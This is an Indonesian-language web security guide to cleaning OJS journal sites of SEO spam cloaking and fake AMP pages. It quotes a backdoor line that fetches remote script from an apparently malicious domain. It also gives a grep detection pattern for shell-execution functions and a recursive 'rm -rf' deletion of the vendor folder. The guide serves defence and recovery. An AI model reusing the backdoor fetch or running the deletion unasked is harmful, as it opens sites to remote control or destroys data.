Website jurnal berbasis Open Journal Systems (OJS) sering menjadi target:
- Inject SEO spam (togel, slot, judi)
- AMP hijack (
/amp/...) - Cloaking khusus Googlebot
- Canonical palsu dari domain luar
Kasus ini berbahaya karena:
- Merusak reputasi jurnal
- Bisa ditandai Google sebagai spam
- Turun ranking bahkan deindex
Bagaimana Cara Mengetahui Website Terkena?
Ciri umum:
- Di Google muncul konten judi
- Ada URL seperti:
/amp/nama_domain/ - GSC menunjukkan halaman aneh
- Website normal saat dibuka biasa
Ini disebut:
SEO Spam Cloaking + External AMP Injection
STRUKTUR SERANGAN
Biasanya terdiri dari 2 bagian:
1. Backdoor di Hosting
Contoh:
file_get_contents('https://absolute-water.live/shell/...')
Fungsi:
- mengambil script dari luar
- menjalankan perintah tersembunyi
2. Domain Spam Eksternal
Contoh:
https://absolute-water.live/amp/nama_domain/
Isi:
<link rel="canonical" href="https://nama_domain.com/" />
Fungsi:
- menipu Google agar mengira itu bagian dari website Anda
LANGKAH 1 — MASUK KE SERVER
cd ~/public_html/nama_domain.com
Fungsi:
- Masuk ke folder website utama
- Semua scan dilakukan dari sini
LANGKAH 2 — SCAN BACKDOOR
grep -Rni "eval\|base64_decode\|file_get_contents\|shell_exec\|passthru\|system(" .
Fungsi:
grep→ mencari teks dalam file-R→ recursive (semua folder)-n→ tampilkan nomor baris- keyword:
eval→ eksekusi kode tersembunyibase64_decode→ kode disamarkanfile_get_contents→ ambil script dari luarshell_exec→ jalankan perintah server
Ini adalah pola umum malware
LANGKAH 3 — IDENTIFIKASI BACKDOOR
Contoh file berbahaya:
SignatureVerificationData.php
Isi:
file_get_contents('https://absolute-water.live/...')
Ini berarti:
- website pernah ditembus
- ada remote control
LANGKAH 4 — NONAKTIFKAN BACKDOOR
mv SignatureVerificationData.php SignatureVerificationData.php.INFECTED
Fungsi:
mv→ rename file- memutus eksekusi file tanpa menghapus (untuk analisis)
LANGKAH 5 — BERSIHKAN VENDOR (PENTING)
rm -rf lib/pkp/lib/vendor
Fungsi:
rm -rf→ hapus folder beserta isinya- menghapus semua dependency yang mungkin terinfeksi
Lalu upload ulang dari source OJS asli
LANGKAH 6 — CEK SEBAGAI GOOGLEBOT
curl -A "Googlebot" -L https://nama_domaim.com/
Fungsi:
curl→ ambil isi website-A "Googlebot"→ menyamar sebagai bot Google-L→ follow redirect
Filter spam:
curl -A "Googlebot" -L https://jisece.com/ | grep -Ei "togel|slot|judi|casino"
Jika kosong:
✔ Website bersih
LANGKAH 7 — BLOK AMP PALSU
Edit .htaccess:
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/amp/ [NC]
RewriteRule ^ - [R=404,L]
Fungsi:
- blok semua URL
/amp/ 404→ tidak ditemukanL→ stop proses rewrite
Mencegah exploit ulang
LANGKAH 8 — VALIDASI SERVER
curl -A "Googlebot" -I https://jisece.com/amp/nama_domain/
Fungsi:
-I→ hanya header (tanpa isi)- memastikan status HTTP
Hasil harus:
404 Not Found
LANGKAH 9 — UPDATE GOOGLE
Gunakan:
Google Search Console
Langkah:
- URL Inspection
- Test Live URL
- Request Indexing
LANGKAH 10 — SUBMIT SITEMAP
Pastikan:
https://nama_domain.com/sitemap.xml
Fungsi:
- memberitahu Google halaman asli
- mempercepat recovery SEO
LANGKAH 11 — HARDENING SERVER
Disable fungsi berbahaya
disable_functions = shell_exec,passthru,exec,system
Fungsi:
- mencegah eksekusi perintah OS
Set permission aman
find . -type f -name "*.php" -exec chmod 644 {} \;
find . -type d -exec chmod 755 {} \;
Fungsi:
- file tidak bisa diubah sembarangan
- folder tetap bisa diakses
HASIL AKHIR
| Komponen | Status |
|---|---|
| Backdoor | ❌ Hilang |
| AMP internal | ❌ Tidak ada |
| Cloaking | ❌ Tidak ada |
| SEO spam | ❌ dari luar |
| Website | ✅ Aman |
PROSES PEMULIHAN GOOGLE
- 1–3 hari → mulai bersih
- 1–2 minggu → normal kembali
TIPS PENTING (ANTI TERULANG)
- Update OJS rutin
- Hindari plugin tidak resmi
- Backup berkala
- Scan mingguan
- Gunakan HTTPS + firewall
PENUTUP
Kasus ini bukan berarti website rusak total.
Ini kombinasi:
- backdoor kecil
- serangan SEO eksternal
Setelah dibersihkan:
Website kembali aman & profesional
Prev tidak ada
Belum ada posting sebelumnya di kategori ini.
Next • Web Security
Website Jurnal Tiba-Tiba Muncul Judi Slot di Google? Ini Penyebab dan Solusi Lengkapnya